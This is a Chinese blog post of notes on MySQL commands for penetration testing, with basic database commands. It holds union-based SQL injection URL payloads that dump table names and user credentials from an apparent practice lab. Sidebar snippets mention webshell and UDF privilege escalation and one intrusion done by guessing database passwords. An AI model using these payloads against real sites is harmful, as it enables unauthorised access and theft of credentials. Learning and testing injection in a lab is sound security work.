渗透中Mysql常用命令

最新推荐文章于 2023-03-27 09:36:31 发布
最新推荐文章于 2023-03-27 09:36:31 发布
阅读量248 收藏 1
点赞数
分类专栏: 笔记 文章标签: 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42039946/article/details/119081731
版权

渗透中常用命令

查看数据库版本
select @@version;
切换数据库到information_schema
use information_schema;
查看有哪些数据库
show tables;        注意SCHEMATA表,这张表里有mysql所有的数据库名称

查看指定数据库有哪些表
select table_name form information_schema.tables where table_schema="demotest";

看指定数据库的指定表字段
select column_name from information_schema.columns where table_name="user" and table_schema="demotest";

显示数据库名:database()
聚合显示表 group_concat(table_name)
聚合显示字段 group_concat(column_name)
聚合数值concat_ws('column_name1','conlumn_name2')

常见用法:
?id=1 and 1=2 union select 1,2,database()--+
?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+
?id=1 and 1=2 union select 1,2,concat_ws(',',id,username,password) from security.users limit 0,1--+  \\显示第一行数据

Mysql常用命令

查看有什么数据库

show databases;

创建数据库:

create database demodb;

删除数据库:

drop database demodb;

切换到某数据库

use demotest;   使用demotest数据库(需要已经创建好demotest数据库)

创建数据表

create table user (name varchar(25) , uid int(25));

删除数据表

drop table user;

显示有哪些表

show tables;

在数据表中插入数值

insert user value("zs" , "10");
insert user value("ls" , "20");

 查看表中所有数据

select * from user;

查看表中指定数据

select uid from user where name="zs" ;

 

更新表中数值

update user set uid="30" where name="zs";

 

删除表中行数据

delete from user where name="ls";

一个小网工
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
渗透测试常用的mysql数据库命令
haha1314的博客
04-30 765
首先进入到mysql命令行 show databases; 查看数据库 use xiaoyi; 使用数据库 dvwa show tables; 查看表名 select * from users; select user,password from users; 查看其的user和password列 create database wf; 创建数据库wf ...
mysql 渗透命令_mysql渗透常用几个命令以及含义
weixin_35588980的博客
02-01 236
1.secure_file_priv 文件导入导出功能show global variables like '%secure_file_priv%'; 查看功能是否开启因为secure_file_priv参数是只读参数,不能使用set global命令修改。打开my.cnf 或 my.ini,加入以下语句后重启mysql。secure_file_priv=''查看secure_fi...
渗透测试,常用的 mysql攻击命令组合详解《用法》
qq_33993881的博客
03-27 526
这可以用于在渗透测试查找目标系统的关联数据或者弱点。
mysql渗透常用几个命令以及含义
atw63792的博客
03-09 201
1.secure_file_priv 文件导入导出功能 show global variables like '%secure_file_priv%'; 查看功能是否开启 因为secure_file_priv参数是只读参数,不能使用set global命令修改。 打开my.cnf 或 my.ini,加入以下语句后重启mysql。 secure_file_priv=...
MySQL的system命令在渗透测试的使用以及UDF提权
weixin_30810239的博客
01-31 291
声明:下面引用关于SYSTEM的东西是自己之前的内容,是自己没有研究透导致的错误结论:有了错就要改,做技术的不能弄虚作假,时时刻刻要求自己要谨慎,虽然我的博客没人看,但是也要向所有已经看到的人道歉,错了就是错了。 说明: 错误点:SYSTEM执行的是MYSQL-CLI客户端自己所在机器的命令,也就是你使用mysql命令行方式连接到对端后,使用SYSTEM执行的还是自己所在机器的指令。比如你sy...
web安全渗透测试.7z
最新发布
04-08
在Web安全领域,渗透测试常常涵盖SQL注入、XSS攻击、文件包含漏洞、命令注入、权限绕过等测试项目。 【压缩包子文件的文件名称列表】 1. **lanmp.sh** - 这可能是一个安装LAMP(Linux, Apache, MySQL, PHP)环境的...
webshell提权的常用端口介绍
10-22
在探讨WebShell提权过程的常用端口时,我们需要对几个关键概念有一个基本的理解:WebShell、提权以及网络通信的端口。 ### WebShell概述 WebShell是一种通过Web方式来控制服务器或网站的应用程序。它通常以脚本...
黑帽渗透web安全基础.txt
06-25
44.注入常用函数.mp4 45.防火墙.mp4 46.曾删改报错注入+怎么找这种漏洞.mp4 47.其他数据库的注入.mp4 2.xss 48.什么是XSS发送ajax实现跨域.mp4 49.理解ajax同异步之学员争辩.mp4 50.存储XSS.mp4 51.反射XSS.mp4 52....
2022最新Web渗透面试大全.pdf
11-20
首先,面试提到了两个常用的渗透测试工具:MSF(Metasploit Framework)和Burp Suite。Burp Suite主要用于HTTP通信的拦截、修改和分析,其主要功能包括仪表盘、漏洞扫描、代理、测试器、重发器、定序器、编码器、...
PHP+Mysql 带SQL注入源码 下载
11-29
MySQL是最常用的开源关系型数据库管理系统之一,而SQL注入则是一个常见的安全漏洞,通常发生在不正确过滤用户输入的情况下,导致恶意SQL命令被执行。 在压缩包文件 "6f3c3e6b84be4f4c83d65218d4e91b2a" ,虽然...
mysql渗透的技巧总结
ytuo1223的专栏
10-08 700
mysql渗透的技巧总结... 目录: 0×00 mysql一般注入(select) 0×01 mysql一般注入(insert、update) 0×02 mysql报错注入 0×03 mysql一般盲注 0×04 mysql时间盲注 0×05 mysql其他注入技巧 0×06 mysql数据库版本特性 0×07 声明 正文: 0×
一次mysql渗透过程
盗才生的博客
04-25 2927
1 打开目标站点:www.xxx.com 2 注册账号并登录,大概找下注入点,没找到 3 用namp -A -T4 目标站点扫描开放的服务    发现mysql等 4 猜弱口令 + 字典  对mysql进行了破译  (运气较好,得到了密码) 5 连接到mysql   找到用户表,密码用md5加密,试了几个,解不出来,应该有加随机字符    于是复制了一个超级管理员,用户名及密码复制之前
mysql varchar最多可以存多少汉字_Web渗透MySQL 快速入门
weixin_39682412的博客
11-21 229
===================================================0x01 数据库基本概念数据库:信息存储的仓库。可以把数据存储在数据库。非关系型数据库系统,键值对的方式存储数据,redis 数据库。关系型数据库系统:表 一个数据库可以有若干张表(形式上你可以看做日常生活建立的表)字段 表里面的信息会分若干个栏目来存,这些栏目呢,我们在数据库技术叫"字段...
SQL注入 (1)
qq_39527920的博客
08-12 1220
第一步:测试是否存在注入点,用and语句测试。 http://120.203.13.75:6815/?id=1 and 1=1  http://120.203.13.75:6815/?id=1 and 1=2 一网址可以正常显示,二网址则无法显示,所以推断有注入点。 第二步:猜测字段 http://120.203.13.75:6815/?id=1 order by 2 http:...
内联函数online的定义和作用
qq_44667165的博客
09-26 3599
说明: 内联函数是一个小型函数,以牺牲空间来节省函数调用带来的额外开销,一般用以比较小函数或者使用频率很高的函数,函数内部内部没有复杂的语句,如开关语句switch,循环语句for等 定义: (1)在 C++ ,可以在定义函数时,在返回值类型前面加上 inline 关键字 inline int max() { ...... return 0; } (二)直接在类的内部进行函数的声明和定义,则默认其是内联函数 class A { public: int max() { ...... ret
SQL注入——联合注入
初见辉少
07-12 980
SQL注入原理:攻击者通过构造不同的SQL语句来实现对数据库的操作 SQL注入的本质:我们也能操作别人的数据库 数据库结构:库:就是一堆表组成的数据集合 表:类似Excel,有行和列组成的二维表 字段:表的列称为字段 记录:表的行称为记录 单元格:行和列相交的地方成为单元格 在数据库里有一个系统库:information_schema 在他里面有个存放所有库名的表:schemata schema_name 库名 ...
mysql 渗透函数_渗透MySQL内置函数的应用 -电脑资料
weixin_42620340的博客
02-18 141
在Access、SQL Server注入时,用到的方法在MySQL也能很好的得到发挥,在MySQL有很多内置函数都可以直接用在SQL语句里,这样就可以试注入变得更加灵活,以得到更多关于系统的信息,DATABASE()USER()SYSTEM_USER()SESSION_USER()CURRENT_USER()各个函数的具体作用大家可以查阅MySQL手册,注意下面这句UPDATE:UPDATE...
SQL 注入-基于联合查询的字符型GET注入
xdjxi的博客
02-16 649
实验原理 字符型GET注入,其注入点存在于URL的GET参数处; 攻击者可以通过构造恶意的GET输入参数,利用union select 命令进行注入,暴露数据库存储的信息。 实验步骤 1 访问SQLI-Labs网站 http://(加靶机IP)/sqli-labs/Less-1/ 登录后,根据网页提示,定一个GET参数 http://(靶机ip)/sqli - labs / Less/?id=1 2 寻找注入点 用以下三条payload寻找注入点及判断注入点的类型; http:/
Metasploit Framework 技术详解与常用命令
"这篇文档是关于Metasploit Framework(MSF)的技术总结,涵盖了MSF的基本概念、常用命令以及高级用法。它旨在解决渗透测试者在面对众多软件和复杂命令时的记忆和效率问题。" Metasploit Framework(MSF)是一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一个小网工

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值